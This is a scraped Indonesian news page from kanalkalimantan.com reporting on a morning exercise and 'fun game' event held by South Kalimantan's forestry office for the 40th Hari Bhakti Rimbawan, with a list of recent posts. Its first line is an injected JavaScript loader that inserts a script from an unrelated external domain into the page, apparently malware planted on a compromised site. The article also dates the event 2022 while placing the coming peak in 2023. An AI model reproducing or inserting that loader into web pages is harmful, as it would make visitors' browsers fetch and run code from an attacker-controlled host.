(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Dishut Prov Kalsel

Hari Bhakti Rimbawan Ke-40, Dishut Kalsel Dan UPT Kementerian LHK Adakan Senam dan Fun Game Rimbawan


KANALKALIMANTAN.COM, BANJARBARU – Dalam rangkaian acara menyambut peringatan Hari Bhakti Rimbawan ke-40, Dinas Kehutanan Provinsi Kalimantan Selatan bersama UPT Kementerian LHK meriahkan dengan kegiatan senam pagi bersama di halaman kantor BPSI LHK Banjarbaru, Jum’at (10/3/2022).

Dalam sambutannya Kadishut Prov Kalsel Hj. Fathimatuzzahra menyampaikan bahwa kegiatan ‘senam pagi dan fun game rimbawan’ tersebut merupakan rangkaian awal dari kegiatan peringatan hari bhakti rimbawan ke-40.

“Direncanakan untuk acara puncaknya nanti pada tanggal 16 Maret 2023 mendatang kita akan melaksanakan upacara dan penanaman bersama yang terletak di jalan golf kecamatan landasan ulin utara kabupaten banjar (depan jalan pom bensin/SPBU Landasan Ulin). Penanaman nanti dilaksanakan ditanah milik Pemprov Kalsel seluas 23 Ha, dan nanti akan bersama kita tanami” kata Hj. Fathimatuzzahra.

Hj. Fathimatuzzahra juga menambahkan bahwa dalam peringatan Hari Bhakti Rimbawan ke-40 tersebut juga dirangkai dengan kegiatan penanaman oleh KPH lingkup Dishut Kalsel bersama Desa yang berada diwilayah kelola KPH masing-masing.

“Selain penanaman KPH bersama Desa diwilayah kelolanya, pada puncak peringatan Hari Bhakti Rimbawan ke-40 nanti juga akan ada acara MoU antara pemegang izin industri dengan Kelompok Tani Hutan yang bertujuan untuk mengakomodir bahan baku industri dan menjadikan Kalsel sebagai Sentra Kayu,” ucapnya.

Untuk menjadikan Kalsel sebagai sentra kayu, Aya -akrab disapa- menuturkan akan berkolaborasi dengan BPDASHL Barito untuk memfasilitasi bibit tanamannya yang nanti akan ditanam di areal hutan sosial.

“Jadi dalam hal ini kita ingin semuanya berkolaborasi mulai dari kegiatan mengakomodir bahan baku industri/sentra kayu Kalsel, peningkatan tutupan lahan, peningkatan atau mempertahankan serapan karbon yang merupakan ambisi besar Indonesia’s Folu Net Sink 2030,” tuturnya.

Dalam rangkaian acara peringatan Hari Bhakti Rimbawan ke-40 tersebut seluruh peserta antusias ikut serta berbagai macam kegiatan yang diadakan, selain melaksanakan senam pagi juga diisi dengan kegiatan ‘fun game rimbawan’ yang terdiri dari lomba tarik tambang putra-putri sampai lomba lompat karung putra-putri.

Rangkaian acara peringatan Hari Bhakti Rimbawan ke-40 tersebut semakin meriah dengan diadakannya pembagian dorprize untuk para peserta yang beruntung.

Diharapkan dengan terlaksananya kegiatan tersebut selain memeriahkan Hari Bhakti Rimbawan ke-40 juga dapat mempererat jiwa korsa dan memperkuat solidaritas sesama rimbawan.(kanalkalimantan.com/al)

 

 


Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

2 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

3 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

4 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

6 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

6 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

7 jam ago

This website uses cookies.